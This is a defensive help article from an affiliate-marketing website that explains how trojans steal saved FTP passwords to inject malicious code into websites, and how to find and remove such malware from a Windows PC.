Affiliate marketing for beginners

contentp image
More Info »
| RSS Feed | sitemap | Contact 

» Home » List of articles » FTP passwords stolen

How FTP passwords are stolen?

This part is moved from website hacked page, because, in this case, hackers are not attacking your website, your PC is the target, and that is the reason why your websites are "hacked". This article will explain how that is done (in most cases), and how to solve that problem.

Long story short, it is possible that you have Trojan / virus / spyware residing in your PC and sending info to hackers. Despite your newest and often updated Anti-Virus software, latest versions of Trojans/Viruses can slip through resident protection and hide on hard disk, disabling Anti-Virus scanner.

Now, say that you collected one of them. Saved passwords from FTP software are stolen, they are sent, along with FTP urls, to Web robot script on some website, the same script is logging to your FTP account, downloading pages (usually default pages from directories) and javascripts. Some iframe or javascript code are inserted and files are uploaded back to your websites. Now, your websites are spreading viruses and trojans. Different IPs (usually proxies) will appear in your FTP (on server) log, if this is the case.

At the same time, Trojan (virus, spyware) on your PC can do another tasks. For example, using your PC as mail relay, sending mail spam, or recording everything what you type, or collecting sensitive info, like Credit Cards numbers, or spamming Forums and Blogs,...

If the same is happened to you, (FTP passwords stolen, more than one website hacked at once), do not change FTP passwords from the same PC, use another, or your trusty NoteBook. If you use the same PC to change FTP passwords and for cleaning pages from malicious codes, under 24 hours, your websites will be hacked again.

Do not use that PC until it is cleaned.

How to find Trojans on your PC

As mentioned above, some of them are hiding and blocking anti-virus software. If your PC OS is freezing, or there are errors (some dll), that can be indication that Trojan is trying to block resident virus protection. Do not restore to previous version, instead, restart to Safe Mode and start anti-virus scanning. Or, simple disconnect hard disk and scan it from another PC.

Old fashioned way (WinXP). Ctr-Alt-Del and click on Processes. Now, if there is some process with suspicious name, kill it. Wait a little. If it appears again, that could be your guy. Do not kill it for now. Search for that file name. Check date of that file, write down. Rename that file to something other. Now, kill that process. If new process appears, under different name, try to find all files with the same date (mentioned above). Rename found suspicious (.exe, .dll) files. Kill that new process and wait. If there is no new process, scan your PC (all files) with anti-virus software. Total Commander has this features (search for file names and dates)

Since there are more instances of svchost.exe (processes), some trojans can be loaded using that name. It is hard to find what svchost.exe is fake, but using Process Explorer (free software) you can check from where every instance of svchost.exe is loaded (path). If it is not loaded from system32 folder, it is fake. Fake svchost.exe is the one of Trojans responsible for stealing FTP passwords and other info.

If you find fake svchost.exe (usually loaded from Temp folded), check for keylogger too. KL-detector (free) is useful to find files what are changed while you are typing. File, where your typing is saved, is usually in system32 folder, with *.sys extension. Check for newest (modified) files in that folder too. Even after PC is cleaned from trojans and viruses, use KL detector from time to time, just to be sure.

Another useful freeware is NetWorks, not only like network bandwidth monitor. It can show you all net connections (netstat). If there are too many of them, it is possible that your PC is communicating without your knowledge. Time for action.

Tools you can use to spot and remove Viruses / Trojans of this kind: Malwarebytes' Anti-Malware, KL-detector (keyloggers), latest McAfee Stinger, latest Avast! virus remover (fast scanners), worms doors cleaner (wwdc.exe, ports blocker), GMER (rootkit/malware), Ethereal or wireshark, or any other packet sniffer.

Signs of infection and preventive

Every time when Java is started (Java icon on toolbar appeared), not important what kind of website, be suspicious. Switch console on, to check what is executed. Record list of active processes, so you can spot any strange process later. Check root of hard disk (C:/) for suspicious (autostart, *.inf) files. Keep Anti-virus and anti-spyware software updated. Keep Java and browsers updated. Do not save FTP passwords in FTP software, use some password manager.

Monitor network communication (external modem lamps,LEDs, or bandwidth monitor). Do not leave PC connected to network when it is not used. Freezing, or any file error in windows can be sign of infection.

to top